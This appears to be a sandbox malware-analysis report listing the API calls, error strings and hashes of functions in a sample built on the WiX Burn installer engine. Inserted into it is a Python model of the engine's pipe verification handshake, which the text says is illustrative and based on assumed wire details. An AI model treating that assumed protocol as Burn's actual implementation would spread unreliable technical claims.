                                                                                                                                                                   • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: lstrlen$Value
                                                                                                                                                                  • String ID: BundleUpgradeCode$DWORD Overflow while adding length of string to write REG_MULTI_SZ$Failed to allocate space for string while writing REG_MULTI_SZ$Failed to get total string size in bytes$Failed to set registry value to array of strings (first string of which is): %ls$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\regutil.cpp$failed to copy string: %ls
                                                                                                                                                                  • API String ID: 198323757-1095722736
                                                                                                                                                                  • Opcode ID: 7b5cca9e94de6a9472e5f8891ec44b97777ef0347fe6318c9c573e03ee30f37a
                                                                                                                                                                  • Instruction ID: f3776bb7073731c8355d7564c6c5dbfdd8627719522bec196b5b28a3156a1605
                                                                                                                                                                  • Opcode Fuzzy Hash: 7b5cca9e94de6a9472e5f8891ec44b97777ef0347fe6318c9c573e03ee30f37a
                                                                                                                                                                  • Instruction Fuzzy Hash: BE41E571F41309BBEB11DF58CC4AFAF3678EBC5B44F110069FA25AB280D6709E018BA0
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetCurrentProcessId.KERNEL32(?,8000FFFF,?,?,00000000,?,?), ref: 0092B371
                                                                                                                                                                    • Part of subcall function 009734CC: ReadFile.KERNEL32(00000004,00000004,?,?,00000000,?,00000000,00000000,?,?,0092C427,?,?,00000004,?,00000004), ref: 009734F1
                                                                                                                                                                    • Part of subcall function 009734CC: GetLastError.KERNEL32(?,?,0092C427,?,?,00000004,?,00000004,00000004,?,?,00000004,?,00000004,00000004), ref: 009734FB
                                                                                                                                                                  Strings
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\pipe.cpp, xrefs: 0092B3B7, 0092B3C2, 0092B3DC, 0092B432, 0092B43D, 0092B4B1, 0092B4DF, 0092B4EA
                                                                                                                                                                  • Verification secret from parent is too big., xrefs: 0092B3CA
                                                                                                                                                                  • Failed to read size of verification secret from parent pipe., xrefs: 0092B38F
                                                                                                                                                                  • Verification secret from parent does not match., xrefs: 0092B445
                                                                                                                                                                  • Failed to allocate buffer for verification secret., xrefs: 0092B3F3
                                                                                                                                                                  • Failed to read verification process id from parent pipe., xrefs: 0092B46B
                                                                                                                                                                  • Failed to inform parent process that child is running., xrefs: 0092B49F
                                                                                                                                                                  • Verification process id from parent does not match., xrefs: 0092B4F2
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                   • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CurrentErrorFileLastProcessRead
                                                                                                                                                                  • String ID: Failed to allocate buffer for verification secret.$Failed to inform parent process that child is running.$Failed to read size of verification secret from parent pipe.$Failed to read verification process id from parent pipe.$Verification process id from parent does not match.$Verification secret from parent does not match.$Verification secret from parent is too big.$d:\a\wix4\wix4\src\burn\engine\pipe.cpp
                                                                                                                                                                  • API String ID: 2959708427-3721239626
                                                                                                                                                                  • Opcode ID: 2c98a4eb6a7c6cc4cf17ecffd00c07cdf43774a1b737d0406ee22f3957d9d082
                                                                                                                                                                  • Instruction ID: 414bd722ff472d402f7d6f1ceef0ed95718649399295c9bc2fcc96398549075d
                                                                                                                                                                  • Opcode Fuzzy Hash: 2c98a4eb6a7c6cc4cf17ecffd00c07cdf43774a1b737d0406ee22f3957d9d082
                                                                                                                                                                  • Instruction Fuzzy Hash: EE412A31B80329B7E722B6549C86FBF7BACDB84B10F104116F714BA2D2D3B49D409791
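                                                                                                                                                                   The error strings of this function (pipe.cpp: size of secret read from the parent pipe, "too big" bound, secret compare, process id compare, then an acknowledgement back to the parent) describe a child-side handshake in which the child only accepts commands from a parent that can reproduce a secret and a process id the child already holds. The following is an added model of that exchange, written for this report; it is not code from the sample or from the WiX Burn engine. The wire format (4-byte little-endian lengths, UTF-16LE secret, 4-byte process ids), the 255-character bound and all function names are assumptions made for the illustration.

```python
"""Added model of the parent/child pipe verification handshake (not Burn's code).

Assumed wire format: <u32 secret_len><secret as UTF-16LE><u32 parent_pid>, answered
by the child with <u32 child_pid> once every check has passed.
"""
import hmac
import io
import struct

# Assumed bound on the secret, mirroring the "too big" check the strings
# describe; the real limit is not visible in the dump.
MAX_SECRET_CHARS = 255


class VerificationError(Exception):
    """Raised when the child rejects what the parent sent."""


def parent_send(pipe, secret: str, parent_pid: int) -> None:
    """Parent side: write length-prefixed secret, then its own process id."""
    data = secret.encode("utf-16-le")
    pipe.write(struct.pack("<I", len(data)))
    pipe.write(data)
    pipe.write(struct.pack("<I", parent_pid))


def _read_exact(pipe, n: int) -> bytes:
    """Read exactly n bytes or fail, so a truncated message cannot pass a check."""
    buf = pipe.read(n)
    if len(buf) != n:
        raise VerificationError("Failed to read from parent pipe.")
    return buf


def child_verify(pipe, expected_secret: str, expected_parent_pid: int, my_pid: int) -> int:
    """Child side: validate the parent, then acknowledge.

    expected_secret and expected_parent_pid are what the child received out of
    band (the engine passes them on the child's command line); a parent that
    cannot reproduce both is rejected before any command is processed.
    """
    (cb_secret,) = struct.unpack("<I", _read_exact(pipe, 4))
    # Bound the length before allocating or reading anything of that size.
    if cb_secret // 2 > MAX_SECRET_CHARS:
        raise VerificationError("Verification secret from parent is too big.")
    secret = _read_exact(pipe, cb_secret)
    # Constant-time compare on the raw bytes; no decode needed for the check.
    if not hmac.compare_digest(secret, expected_secret.encode("utf-16-le")):
        raise VerificationError("Verification secret from parent does not match.")
    (parent_pid,) = struct.unpack("<I", _read_exact(pipe, 4))
    if parent_pid != expected_parent_pid:
        raise VerificationError("Verification process id from parent does not match.")
    # All checks passed: inform the parent that the child is running.
    pipe.write(struct.pack("<I", my_pid))
    return my_pid


def run_handshake(secret_sent: str, pid_sent: int, secret_expected: str,
                  pid_expected: int, child_pid: int = 4242) -> int:
    """Drive both sides over an in-memory pipe and return the child's ack."""
    pipe = io.BytesIO()  # constructed stand-in for the named pipe
    parent_send(pipe, secret_sent, pid_sent)
    pipe.seek(0)
    return child_verify(pipe, secret_expected, pid_expected, child_pid)


def handshake_result(secret_sent: str, pid_sent: int, secret_expected: str,
                     pid_expected: int) -> str:
    """Return "ok" on success, otherwise the child's rejection reason."""
    try:
        run_handshake(secret_sent, pid_sent, secret_expected, pid_expected)
        return "ok"
    except VerificationError as exc:
        return str(exc)


if __name__ == "__main__":
    print(handshake_result("s3cret", 1000, "s3cret", 1000))
    print(handshake_result("guess", 1000, "s3cret", 1000))
    print(handshake_result("s3cret", 1001, "s3cret", 1000))
    print(handshake_result("a" * 300, 1000, "s3cret", 1000))
```

                                                                                                                                                                   The order of the checks is the point: the length is bounded before any buffer is sized from it, and the secret is compared before the process id is even read, so an unauthenticated parent learns nothing beyond a closed pipe.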
                                                                                                                                                                  APIs
                                                                                                                                                                  • ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000040,?,00000040,00000000,00000000,0100147D,?,?,?,009141A9,?,?,?,00000000), ref: 00915A5C
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,009141A9,?,?,?,00000000), ref: 00915A68
                                                                                                                                                                  • ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,009141A9,?,?,?,00000000), ref: 00915B05
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,009141A9,?,?,?,00000000), ref: 00915B11
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                   • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: EnvironmentErrorExpandLastStrings
                                                                                                                                                                  • String ID: Failed to allocate buffer for expanded string.$Failed to allocate space for expanded path.$Failed to expand environment variables in string: %ls$Failed to get max length of input buffer.$Failed to re-allocate more space for expanded path.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\envutil.cpp
                                                                                                                                                                  • API String ID: 4064601616-3610958334
                                                                                                                                                                  • Opcode ID: e7277b92040f45a556e01d863f71bd78671060a28862b1154ead2f09a8ca998d
                                                                                                                                                                  • Instruction ID: 2212507b9b46e41af520bba5f30ec89ce2bd19521274b7e61962b7d519de2906
                                                                                                                                                                  • Opcode Fuzzy Hash: e7277b92040f45a556e01d863f71bd78671060a28862b1154ead2f09a8ca998d
                                                                                                                                                                  • Instruction Fuzzy Hash: A441C632BC1A29B7D73256448C4AFDF3E689FC1BA4F134155BA147E2D0E6B48980D6E0
                                                                                                                                                                  APIs
                                                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 009701F5
                                                                                                                                                                  • SysAllocString.OLEAUT32(?), ref: 0097022F
                                                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00970340
                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0097034B
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: StringVariant$AllocClearFreeInit
                                                                                                                                                                  • String ID: Failed getNamedItem in XmlGetAttribute(%ls)$Failed get_attributes.$Failed get_nodeValue in XmlGetAttribute(%ls)$Failed to allocate attribute name BSTR.$Failed to copy attribute value.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp
                                                                                                                                                                  • API String ID: 760788290-2059256487
                                                                                                                                                                  • Opcode ID: 5375cb775b80ee209ff35f6c4cf556486e8f9162403da6ba3e6e45c6266c4e5e
                                                                                                                                                                  • Instruction ID: 3ae9a9e56a41e5ce97a5ab0ed41ce921a411104c5100430156b789ae172894ac
                                                                                                                                                                  • Opcode Fuzzy Hash: 5375cb775b80ee209ff35f6c4cf556486e8f9162403da6ba3e6e45c6266c4e5e
                                                                                                                                                                  • Instruction Fuzzy Hash: 8B41D377740319FBDB119B50CC4EF6E3B79ABC9B15F158058FA09BB291DAB09A40CB90
                                                                                                                                                                  APIs
                                                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 0096FDA6
                                                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 0096FDE3
                                                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 0096FDF4
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to query IXMLDOMParseError.reason., xrefs: 0096FD8A
                                                                                                                                                                  • Failed to query IXMLDOMParseError.filepos., xrefs: 0096FD0C
                                                                                                                                                                  • Failed to query IXMLDOMParseError.line., xrefs: 0096FD35
                                                                                                                                                                  • Failed to query IXMLDOMParseError.linepos., xrefs: 0096FD5E
                                                                                                                                                                  • Failed to query IXMLDOMParseError.srcText ., xrefs: 0096FDC7
                                                                                                                                                                  • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp, xrefs: 0096FCE2
                                                                                                                                                                  • Failed to query IXMLDOMParseError.errorCode., xrefs: 0096FCD3
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FreeString
                                                                                                                                                                  • String ID: Failed to query IXMLDOMParseError.errorCode.$Failed to query IXMLDOMParseError.filepos.$Failed to query IXMLDOMParseError.line.$Failed to query IXMLDOMParseError.linepos.$Failed to query IXMLDOMParseError.reason.$Failed to query IXMLDOMParseError.srcText .$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp
                                                                                                                                                                  • API String ID: 3341692771-2297621156
                                                                                                                                                                  • Opcode ID: 8a0a4973ab82af1f069894c36cd63d2d21f1f83243241f22b38ad7e13599824c
                                                                                                                                                                  • Instruction ID: 6f7ab7515b6e1f612b8549a15b9344cd8d3dadbd9ec4b9c1f85ee938d759b53c
                                                                                                                                                                  • Opcode Fuzzy Hash: 8a0a4973ab82af1f069894c36cd63d2d21f1f83243241f22b38ad7e13599824c
                                                                                                                                                                  • Instruction Fuzzy Hash: 68417F71A4121AFBEB048B50DD26FAEBB78EF54B45F1140AAB901B71D0EBB06E409A50
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetSystemTime.KERNEL32(?), ref: 009190C8
                                                                                                                                                                  • GetDateFormatW.KERNEL32(00000400,00000001,?,00000000,00000000,00000000), ref: 009190DC
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 009190E8
                                                                                                                                                                  • GetDateFormatW.KERNEL32(00000400,00000001,?,00000000,?,00000000,?,00000000), ref: 0091915C
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00919166
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DateErrorFormatLast$SystemTime
                                                                                                                                                                  • String ID: Failed to allocate the buffer for the Date.$Failed to get the Date.$Failed to get the required buffer length for the Date.$Failed to set variant value.$d:\a\wix4\wix4\src\burn\engine\variable.cpp
                                                                                                                                                                  • API String ID: 2700948981-1940114245
                                                                                                                                                                  • Opcode ID: 861b385bf9a4cff250dc5e7da1ec30fd1e35bd38ad27c2b1f638e3ef70c8cdc9
                                                                                                                                                                  • Instruction ID: 506afd8e2fdc336aad481fe2ee1a97a7fd2cfb58015b2760079760a1786d9ecd
                                                                                                                                                                  • Opcode Fuzzy Hash: 861b385bf9a4cff250dc5e7da1ec30fd1e35bd38ad27c2b1f638e3ef70c8cdc9
                                                                                                                                                                  • Instruction Fuzzy Hash: EB31E932B8422E76E72166548C4AFEF7A6C9F49B50F110115FF45FB2C1D6609CC182E1
                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateFileW.KERNEL32(?,80000000,00000005,00000000,00000003,08000000,00000000), ref: 0092E1DE
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0092E1EE
                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 0092E305
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseCreateErrorFileHandleLast
                                                                                                                                                                  • String ID: %ls container from working path '%ls' to path '%ls'$Container has no verification information: %ls$Copying$Failed to open container in working path: %ls$Failed to verify container hash: %ls$Moving$d:\a\wix4\wix4\src\burn\engine\cache.cpp
                                                                                                                                                                  • API String ID: 2528220319-3503443624
                                                                                                                                                                  • Opcode ID: eb826a4abc6ecfe980ad4e4b220dbcbde74ea7852b0d9bc78b945af0d7085064
                                                                                                                                                                  • Instruction ID: a8ec084e15b5c7b28130c367cf800cf8961136b80ade2111b1488a4b8c333f37
                                                                                                                                                                  • Opcode Fuzzy Hash: eb826a4abc6ecfe980ad4e4b220dbcbde74ea7852b0d9bc78b945af0d7085064
                                                                                                                                                                  • Instruction Fuzzy Hash: AA31D832681224BBEF225E54DC4AFAF3A2DEB49B10F050014FF157A2E5D2B5CC60A7A1
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetModuleHandleW.KERNEL32(msi,DllGetVersion), ref: 00919B0E
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00919B15
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00919B21
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressErrorHandleLastModuleProc
                                                                                                                                                                  • String ID: DllGetVersion$Failed to create msi.dll version from QWORD.$Failed to find DllGetVersion entry point in msi.dll.$Failed to get msi.dll version info.$Failed to set variant value.$d:\a\wix4\wix4\src\burn\engine\variable.cpp$msi
                                                                                                                                                                  • API String ID: 4275029093-1657635385
                                                                                                                                                                  • Opcode ID: 18702215f288202fb933df666eb898549a48aa27ab84cb1fe2758e0f355f4546
                                                                                                                                                                  • Instruction ID: fec977be051da41ffa5bec9ba3d8487caff04b3e16af81761ff97c1039fdb585
                                                                                                                                                                  • Opcode Fuzzy Hash: 18702215f288202fb933df666eb898549a48aa27ab84cb1fe2758e0f355f4546
                                                                                                                                                                  • Instruction Fuzzy Hash: 9731D972F8572EB7E7216768DC06FEF666C9B48B54F010115FA05FB2C1E6A89C4087E0
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0096B0E2: EnterCriticalSection.KERNEL32(009AD4F0,00000000,00000000,00000001,0000000C,0000000C,?,0092A885,00000000,00000001,00988FA8,?,00000000,00000000,0000000C,00000000), ref: 0096B0F7
                                                                                                                                                                    • Part of subcall function 0096B0E2: LeaveCriticalSection.KERNEL32(009AD4F0,?,0092A885,00000000,00000001,00988FA8,?,00000000,00000000,0000000C,00000000,00000001,00000000,00000000,00000000,00000008), ref: 0096B2F9
                                                                                                                                                                  • OpenEventLogW.ADVAPI32(00000000,Application), ref: 0092A9D3
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 0092A9DF
                                                                                                                                                                  • ReportEventW.ADVAPI32(00000000,00000001,00000001,00000001,00000000,00000001,00000000,00988E3C,00000000), ref: 0092AA36
                                                                                                                                                                  • CloseEventLog.ADVAPI32(00000000), ref: 0092AA3D
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Event$CriticalSection$CloseEnterErrorLastLeaveOpenReport
                                                                                                                                                                  • String ID: Application$Failed to open Application event log$Setup$_Failed$d:\a\wix4\wix4\src\burn\engine\logging.cpp$log
                                                                                                                                                                  • API String ID: 1844635321-122217184
                                                                                                                                                                  • Opcode ID: 6e90424a473b4695ff6411668ec01c2a73246cf3173992b77733f2da9d465057
                                                                                                                                                                  • Instruction ID: 73829ede37e048d67301d07c2f42a7f33c7baf07f9564703f9810331b3956e64
                                                                                                                                                                  • Opcode Fuzzy Hash: 6e90424a473b4695ff6411668ec01c2a73246cf3173992b77733f2da9d465057
                                                                                                                                                                  • Instruction Fuzzy Hash: A0012663A896713BA33232267C4DEBF0C6CDBC6F69B060158FD15F6281E6544C81D2F1
                                                                                                                                                                  APIs
                                                                                                                                                                  • CloseHandle.KERNEL32(68056A00,?,00000000,?,009180B3,?,?,?,?), ref: 00917792
                                                                                                                                                                  • CloseHandle.KERNEL32(00010068,?,00000000,?,009180B3,?,?,?,?), ref: 009177A9
                                                                                                                                                                  • DeleteCriticalSection.KERNEL32(0091876B,?,00000000,?,009180B3,?,?,?,?), ref: 009177BC
                                                                                                                                                                  • CloseHandle.KERNEL32(5468FFFF,?,009180B3,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 009177CF
                                                                                                                                                                  • CloseHandle.KERNEL32(53009825,?,009180B3,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 009177E6
                                                                                                                                                                  • CloseHandle.KERNEL32(E850C094,0091879F,009187BB,?,009180B3,?,?,?,?), ref: 00917825
                                                                                                                                                                  • DeleteCriticalSection.KERNEL32(0091817F,009184EF,0091879F,009187BB,?,009180B3,?,?,?,?), ref: 00917844
                                                                                                                                                                    • Part of subcall function 00969966: LocalFree.KERNEL32(00917FB7,?,00917764,d:\a\wix4\wix4\src\burn\engine\variable.cpp,?,00000000,?,009180B3,?,?,?,?), ref: 00969970
                                                                                                                                                                  • DeleteCriticalSection.KERNEL32(009187D7,0091828B,009180F3,0091829F,00918293,009181AB,0091815B,00918133,009182C3,009184D3,0091843B,00918163,?,009180B3,?,?), ref: 009179B6
                                                                                                                                                                  Strings
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\variable.cpp, xrefs: 0091775E
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                   • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseHandle$CriticalDeleteSection$FreeLocal
                                                                                                                                                                  • String ID: d:\a\wix4\wix4\src\burn\engine\variable.cpp
                                                                                                                                                                  • API String ID: 352808245-1905863517
                                                                                                                                                                  • Opcode ID: cd32fa2e8ade1526d7ab35845fa73d5295b3ee930a1858846e52710f6dcd988a
                                                                                                                                                                  • Instruction ID: 52f94fdf440b848d7d8da4618b82830c4bc1ad6358a8d73a530968479947e171
                                                                                                                                                                  • Opcode Fuzzy Hash: cd32fa2e8ade1526d7ab35845fa73d5295b3ee930a1858846e52710f6dcd988a
                                                                                                                                                                  • Instruction Fuzzy Hash: 52613D71B04B09AADA20EBB5D889FDBB3FDAF84340F444819B55AD7155DB34F584CB20
                                                                                                                                                                  APIs
                                                                                                                                                                  • RegEnumKeyExW.ADVAPI32(?,?,?,0097526C,00000000,00000000,00000000,00000000,00020019,00000000,00000000,00000000,00020019,00000000,00916CF2,00000000), ref: 0096C9ED
                                                                                                                                                                  • RegQueryInfoKeyW.ADVAPI32(?,?,?,0097526C,00000000,00000000,00000000,00000000,00020019,00000000,00000000,00000000,00020019,00000000,00916CF2,00000000), ref: 0096CA1B
                                                                                                                                                                  • RegEnumKeyExW.ADVAPI32(?,?,?,0097526C,00000000,00000000,00000000,00000000,00020019,00000000,00000000,00000000,00020019,00000000,00916CF2,00000000), ref: 0096CAA2
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                   • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Enum$InfoQuery
